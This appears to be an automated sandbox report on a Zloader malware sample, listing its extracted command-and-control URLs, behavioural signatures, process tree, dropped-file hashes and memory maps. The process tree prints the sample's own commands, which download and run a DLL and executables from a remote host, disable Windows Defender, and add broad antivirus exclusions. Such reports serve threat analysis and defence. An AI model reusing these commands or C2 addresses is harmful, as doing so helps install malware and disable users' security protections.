Analysis

  • max time kernel
    61s
  • max time network
    180s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    13-08-2021 08:15

General

  • Target

    f53350e79061f139201dfe86a38c3c36.exe

  • Size

    165KB

  • MD5

    f53350e79061f139201dfe86a38c3c36

  • SHA1

    90b00fc5d9a4018df2db6bca54f9a37082053989

  • SHA256

    26b22c0b1b4aab76f6a483ae3aec9f4eface7c7f5aeb546554afdf4ab0d54a6f

  • SHA512

    4576dca186150fbd0c6db080d943a361556f7e6a0bf0abca5c2c3086e2c347b7cf1ba9c9f202be19ec6bff898f02960bb3fc39173f619068910aa1491ac4594e

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f53350e79061f139201dfe86a38c3c36.exe
    "C:\Users\Admin\AppData\Local\Temp\f53350e79061f139201dfe86a38c3c36.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Windows\system32\cmd.exe
      cmd /c start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1092
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest https://pornotublovers.com/JavaN.dll -OutFile JavaN.dll
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1160
      • C:\Windows\system32\regsvr32.exe
        regsvr32 JavaN.dll
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\SysWOW64\regsvr32.exe
          JavaN.dll
          4⤵
          • Loads dropped DLL
          PID:1884
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe
            5⤵
              PID:820
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
          3⤵
            PID:616
          • C:\Windows\system32\cmd.exe
            cmd /c nsudo.bat
            3⤵
              PID:1996
              • C:\Windows\system32\cacls.exe
                "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                4⤵
                  PID:908
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
                  4⤵
                    PID:1844
                  • C:\Users\Admin\AppData\Roaming\javase.exe
                    javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1580
                    • C:\Users\Admin\AppData\Roaming\javase.exe
                      javase -U:T sc config WinDefend start= disabled
                      4⤵
                        PID:2028
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
                        4⤵
                          PID:1616
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
                          4⤵
                            PID:328
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
                            4⤵
                              PID:700
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
                              4⤵
                                PID:1844
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
                                4⤵
                                  PID:1472
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
                                  4⤵
                                    PID:756

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Registry Run Keys / Startup Folder

                            1
                            T1060

                            Defense Evasion

                            Modify Registry

                            1
                            T1112

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03a97fd7-83b8-460e-ba9c-379dde8eeac3
                              MD5

                              2d5cd190b5db0620cd62e3cd6ba1dcd3

                              SHA1

                              ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                              SHA256

                              ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                              SHA512

                              edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_06ae0aa9-cf24-4ad8-95d3-63bafb0fc8cd
                              MD5

                              a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                              SHA1

                              81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                              SHA256

                              dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                              SHA512

                              8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_145c5365-0bef-4d57-83f2-fb6cd7df183c
                              MD5

                              d89968acfbd0cd60b51df04860d99896

                              SHA1

                              b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                              SHA256

                              1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                              SHA512

                              b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3dffdb56-6a7e-4497-ba8c-588728bcbdd0
                              MD5

                              faa37917b36371249ac9fcf93317bf97

                              SHA1

                              a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                              SHA256

                              b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                              SHA512

                              614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_584c1845-7193-4407-b575-453a405a65df
                              MD5

                              7f79b990cb5ed648f9e583fe35527aa7

                              SHA1

                              71b177b48c8bd745ef02c2affad79ca222da7c33

                              SHA256

                              080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                              SHA512

                              20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ae018f4c-cb12-4b00-8e61-3afb259ad9bd
                              MD5

                              e5b3ba61c3cf07deda462c9b27eb4166

                              SHA1

                              b324dad73048be6e27467315f82b7a5c1438a1f9

                              SHA256

                              b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                              SHA512

                              a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7277b5e-9405-4697-979a-3288d44a8938
                              MD5

                              6f0d509e28be1af95ba237d4f43adab4

                              SHA1

                              c665febe79e435843553bee86a6cea731ce6c5e4

                              SHA256

                              f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                              SHA512

                              8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                              MD5

                              ce565addf4ee06719a25cd1fbde2407b

                              SHA1

                              147df33adbaa97e19894af925f513a7ac62019ea

                              SHA256

                              0fd60aeaaf4049ba5e9059126b5cf15781232196e52b0efaebfea80cc0ec2367

                              SHA512

                              71f94c1bd2ced3bc28f22a47ccd7d562d46498f91c80c39d1915c6385e181d00eaac3d11cba552497112ac9d3ecc6849bce2cbe4bc5197f034037746431f006e

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                              MD5

                              10f052a1a81021a264d2be0b254f6fb2

                              SHA1

                              b8ae787e0d4da0ed1b28330198de7a4873232343

                              SHA256

                              ab5a2afd384c3fe5b8c63e50135e4773bb5c3b2e76829215a1f93861b8187e34

                              SHA512

                              45981281903dc81a8086fca3bd2cf2f7cb03864150f708a87ada024b6c67c2a8276586f8a8c8c5cd551f8e84ec27363a2a5d07dfb9b67d360e222659ad383af9

                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
                              MD5

                              6ec3249fe894347adf88914507bb3988

                              SHA1

                              3ef4f723961a5787f89cda88a035762341189427

                              SHA256

                              49e15a108b97b2d42d2f784cb9413a6742c09a551f361edc0d1943eac2883696

                              SHA512

                              54d7021a0dc75cac00bc76c1c35c50b5c01fc7ec5b923297d302768be594bf35372d89ed5d01c53d90a54c06fd174dfa51a7fec66f72f0a311f000283b26f00c

                            • C:\Users\Admin\AppData\Roaming\JavaN.dll
                              MD5

                              01e37eb89bd9cc3211ea5312d77d09e6

                              SHA1

                              d5f5f5d953e1e90cf070dd81b14e4b38499bfc10

                              SHA256

                              b4783737e1404098a60fb3896ba6e5f0029d3448b5ab230a44ef07d429910749

                              SHA512

                              f1efc04ca7b853ada2f29efb1a417134e07c2ae51fd61301c1e0fa92446d1a0d6f7898b613b5399359e0c04bb4c10151bc62a721f4f5f66f66f1928342814bc9

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              7f13298578371b163eb4a83b39a97d27

                              SHA1

                              a9329b41619bf9be6c8198b015d0c79a57ef0048

                              SHA256

                              22dc5b556fb8ac608ee7de8ed8413dd088164db46980ba2813b6b2407388d3e4

                              SHA512

                              b15ead3db6bde39f8097ede654d150d4089ab28ffb0b8722fc6e8992e6526b20e4bdf9787734f80978438ee491d3df37a27e8cd4ff31323edf878f60ae52fc5e

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              7f13298578371b163eb4a83b39a97d27

                              SHA1

                              a9329b41619bf9be6c8198b015d0c79a57ef0048

                              SHA256

                              22dc5b556fb8ac608ee7de8ed8413dd088164db46980ba2813b6b2407388d3e4

                              SHA512

                              b15ead3db6bde39f8097ede654d150d4089ab28ffb0b8722fc6e8992e6526b20e4bdf9787734f80978438ee491d3df37a27e8cd4ff31323edf878f60ae52fc5e

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              7f13298578371b163eb4a83b39a97d27

                              SHA1

                              a9329b41619bf9be6c8198b015d0c79a57ef0048

                              SHA256

                              22dc5b556fb8ac608ee7de8ed8413dd088164db46980ba2813b6b2407388d3e4

                              SHA512

                              b15ead3db6bde39f8097ede654d150d4089ab28ffb0b8722fc6e8992e6526b20e4bdf9787734f80978438ee491d3df37a27e8cd4ff31323edf878f60ae52fc5e

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              7f13298578371b163eb4a83b39a97d27

                              SHA1

                              a9329b41619bf9be6c8198b015d0c79a57ef0048

                              SHA256

                              22dc5b556fb8ac608ee7de8ed8413dd088164db46980ba2813b6b2407388d3e4

                              SHA512

                              b15ead3db6bde39f8097ede654d150d4089ab28ffb0b8722fc6e8992e6526b20e4bdf9787734f80978438ee491d3df37a27e8cd4ff31323edf878f60ae52fc5e

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              7f13298578371b163eb4a83b39a97d27

                              SHA1

                              a9329b41619bf9be6c8198b015d0c79a57ef0048

                              SHA256

                              22dc5b556fb8ac608ee7de8ed8413dd088164db46980ba2813b6b2407388d3e4

                              SHA512

                              b15ead3db6bde39f8097ede654d150d4089ab28ffb0b8722fc6e8992e6526b20e4bdf9787734f80978438ee491d3df37a27e8cd4ff31323edf878f60ae52fc5e

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              7f13298578371b163eb4a83b39a97d27

                              SHA1

                              a9329b41619bf9be6c8198b015d0c79a57ef0048

                              SHA256

                              22dc5b556fb8ac608ee7de8ed8413dd088164db46980ba2813b6b2407388d3e4

                              SHA512

                              b15ead3db6bde39f8097ede654d150d4089ab28ffb0b8722fc6e8992e6526b20e4bdf9787734f80978438ee491d3df37a27e8cd4ff31323edf878f60ae52fc5e

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              7f13298578371b163eb4a83b39a97d27

                              SHA1

                              a9329b41619bf9be6c8198b015d0c79a57ef0048

                              SHA256

                              22dc5b556fb8ac608ee7de8ed8413dd088164db46980ba2813b6b2407388d3e4

                              SHA512

                              b15ead3db6bde39f8097ede654d150d4089ab28ffb0b8722fc6e8992e6526b20e4bdf9787734f80978438ee491d3df37a27e8cd4ff31323edf878f60ae52fc5e

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              7f13298578371b163eb4a83b39a97d27

                              SHA1

                              a9329b41619bf9be6c8198b015d0c79a57ef0048

                              SHA256

                              22dc5b556fb8ac608ee7de8ed8413dd088164db46980ba2813b6b2407388d3e4

                              SHA512

                              b15ead3db6bde39f8097ede654d150d4089ab28ffb0b8722fc6e8992e6526b20e4bdf9787734f80978438ee491d3df37a27e8cd4ff31323edf878f60ae52fc5e

                            • C:\Users\Admin\AppData\Roaming\javase.exe
                              MD5

                              5cae01aea8ed390ce9bec17b6c1237e4

                              SHA1

                              3a80a49efaac5d839400e4fb8f803243fb39a513

                              SHA256

                              19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                              SHA512

                              c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                            • C:\Users\Admin\AppData\Roaming\javase.exe
                              MD5

                              5cae01aea8ed390ce9bec17b6c1237e4

                              SHA1

                              3a80a49efaac5d839400e4fb8f803243fb39a513

                              SHA256

                              19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                              SHA512

                              c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                            • C:\Users\Admin\AppData\Roaming\nsudo.bat
                              MD5

                              995c3f852ca1e81fc395a5c46b06cb9e

                              SHA1

                              0bc6bc2e425eef07669fa877573b9ba5513ae833

                              SHA256

                              81c64df94f955a49ea7b12ed58098b3dd43c02a28c2f3484c9d4aec0929ddfeb

                              SHA512

                              62dd4f3051917942ee5cae765f4fa0f4da96c49eafd4f00a978f84ddf139488e78a896ff3bdd307dc7d0bfe1902525aa446d7878f016c5ce895bdaee524eebaf

                            • \??\PIPE\srvsvc
                              MD5

                              d41d8cd98f00b204e9800998ecf8427e

                              SHA1

                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                              SHA256

                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                              SHA512

                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                            • \??\PIPE\srvsvc
                              MD5

                              d41d8cd98f00b204e9800998ecf8427e

                              SHA1

                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                              SHA256

                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                              SHA512

                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                            • \Users\Admin\AppData\Roaming\JavaN.dll
                              MD5

                              01e37eb89bd9cc3211ea5312d77d09e6

                              SHA1

                              d5f5f5d953e1e90cf070dd81b14e4b38499bfc10

                              SHA256

                              b4783737e1404098a60fb3896ba6e5f0029d3448b5ab230a44ef07d429910749

                              SHA512

                              f1efc04ca7b853ada2f29efb1a417134e07c2ae51fd61301c1e0fa92446d1a0d6f7898b613b5399359e0c04bb4c10151bc62a721f4f5f66f66f1928342814bc9

                            • \Users\Admin\AppData\Roaming\javase.exe
                              MD5

                              5cae01aea8ed390ce9bec17b6c1237e4

                              SHA1

                              3a80a49efaac5d839400e4fb8f803243fb39a513

                              SHA256

                              19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                              SHA512

                              c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                            • \Users\Admin\AppData\Roaming\javase.exe
                              MD5

                              5cae01aea8ed390ce9bec17b6c1237e4

                              SHA1

                              3a80a49efaac5d839400e4fb8f803243fb39a513

                              SHA256

                              19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                              SHA512

                              c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                            • memory/328-147-0x000000001A9E0000-0x000000001A9E2000-memory.dmp
                              Filesize

                              8KB

                            • memory/328-142-0x0000000000000000-mapping.dmp
                            • memory/328-148-0x000000001A9E4000-0x000000001A9E6000-memory.dmp
                              Filesize

                              8KB

                            • memory/568-72-0x0000000000000000-mapping.dmp
                            • memory/616-85-0x0000000002420000-0x0000000002421000-memory.dmp
                              Filesize

                              4KB

                            • memory/616-91-0x0000000001DD0000-0x0000000001DD1000-memory.dmp
                              Filesize

                              4KB

                            • memory/616-81-0x0000000000000000-mapping.dmp
                            • memory/616-86-0x000000001AD60000-0x000000001AD61000-memory.dmp
                              Filesize

                              4KB

                            • memory/616-93-0x000000001B710000-0x000000001B711000-memory.dmp
                              Filesize

                              4KB

                            • memory/616-87-0x000000001ACE0000-0x000000001ACE2000-memory.dmp
                              Filesize

                              8KB

                            • memory/616-88-0x000000001ACE4000-0x000000001ACE6000-memory.dmp
                              Filesize

                              8KB

                            • memory/616-90-0x0000000002800000-0x0000000002801000-memory.dmp
                              Filesize

                              4KB

                            • memory/700-165-0x000000001AB14000-0x000000001AB16000-memory.dmp
                              Filesize

                              8KB

                            • memory/700-164-0x000000001AB10000-0x000000001AB12000-memory.dmp
                              Filesize

                              8KB

                            • memory/700-159-0x0000000000000000-mapping.dmp
                            • memory/756-194-0x000000001AC24000-0x000000001AC26000-memory.dmp
                              Filesize

                              8KB

                            • memory/756-193-0x000000001AC20000-0x000000001AC22000-memory.dmp
                              Filesize

                              8KB

                            • memory/756-187-0x0000000000000000-mapping.dmp
                            • memory/820-80-0x0000000000000000-mapping.dmp
                            • memory/820-89-0x0000000000090000-0x00000000000B6000-memory.dmp
                              Filesize

                              152KB

                            • memory/908-96-0x0000000000000000-mapping.dmp
                            • memory/1092-61-0x0000000000000000-mapping.dmp
                            • memory/1160-69-0x0000000002350000-0x0000000002351000-memory.dmp
                              Filesize

                              4KB

                            • memory/1160-63-0x0000000000000000-mapping.dmp
                            • memory/1160-71-0x000000001B720000-0x000000001B721000-memory.dmp
                              Filesize

                              4KB

                            • memory/1160-67-0x000000001AAB0000-0x000000001AAB2000-memory.dmp
                              Filesize

                              8KB

                            • memory/1160-70-0x0000000001FD0000-0x0000000001FD1000-memory.dmp
                              Filesize

                              4KB

                            • memory/1160-65-0x0000000001F80000-0x0000000001F81000-memory.dmp
                              Filesize

                              4KB

                            • memory/1160-66-0x000000001AB30000-0x000000001AB31000-memory.dmp
                              Filesize

                              4KB

                            • memory/1160-68-0x000000001AAB4000-0x000000001AAB6000-memory.dmp
                              Filesize

                              8KB

                            • memory/1472-184-0x000000001A9C0000-0x000000001A9C2000-memory.dmp
                              Filesize

                              8KB

                            • memory/1472-177-0x0000000000000000-mapping.dmp
                            • memory/1472-185-0x000000001A9C4000-0x000000001A9C6000-memory.dmp
                              Filesize

                              8KB

                            • memory/1580-109-0x0000000000000000-mapping.dmp
                            • memory/1616-141-0x00000000026D0000-0x00000000026D1000-memory.dmp
                              Filesize

                              4KB

                            • memory/1616-140-0x0000000002600000-0x0000000002601000-memory.dmp
                              Filesize

                              4KB

                            • memory/1616-128-0x0000000002690000-0x0000000002691000-memory.dmp
                              Filesize

                              4KB

                            • memory/1616-125-0x0000000002550000-0x0000000002551000-memory.dmp
                              Filesize

                              4KB

                            • memory/1616-123-0x000000001ABA4000-0x000000001ABA6000-memory.dmp
                              Filesize

                              8KB

                            • memory/1616-122-0x000000001ABA0000-0x000000001ABA2000-memory.dmp
                              Filesize

                              8KB

                            • memory/1616-116-0x0000000000000000-mapping.dmp
                            • memory/1660-60-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp
                              Filesize

                              8KB

                            • memory/1844-168-0x0000000000000000-mapping.dmp
                            • memory/1844-102-0x000000001AD20000-0x000000001AD21000-memory.dmp
                              Filesize

                              4KB

                            • memory/1844-106-0x0000000002370000-0x0000000002371000-memory.dmp
                              Filesize

                              4KB

                            • memory/1844-107-0x000000001B870000-0x000000001B871000-memory.dmp
                              Filesize

                              4KB

                            • memory/1844-105-0x000000001ACA4000-0x000000001ACA6000-memory.dmp
                              Filesize

                              8KB

                            • memory/1844-104-0x000000001ACA0000-0x000000001ACA2000-memory.dmp
                              Filesize

                              8KB

                            • memory/1844-175-0x000000001AA44000-0x000000001AA46000-memory.dmp
                              Filesize

                              8KB

                            • memory/1844-174-0x000000001AA40000-0x000000001AA42000-memory.dmp
                              Filesize

                              8KB

                            • memory/1844-97-0x0000000000000000-mapping.dmp
                            • memory/1844-103-0x0000000002340000-0x0000000002341000-memory.dmp
                              Filesize

                              4KB

                            • memory/1844-101-0x0000000002260000-0x0000000002261000-memory.dmp
                              Filesize

                              4KB

                            • memory/1884-79-0x0000000010000000-0x000000001015D000-memory.dmp
                              Filesize

                              1.4MB

                            • memory/1884-75-0x0000000000000000-mapping.dmp
                            • memory/1884-78-0x0000000000180000-0x0000000000181000-memory.dmp
                              Filesize

                              4KB

                            • memory/1884-76-0x0000000074F31000-0x0000000074F33000-memory.dmp
                              Filesize

                              8KB

                            • memory/1996-94-0x0000000000000000-mapping.dmp
                            • memory/2028-113-0x0000000000000000-mapping.dmp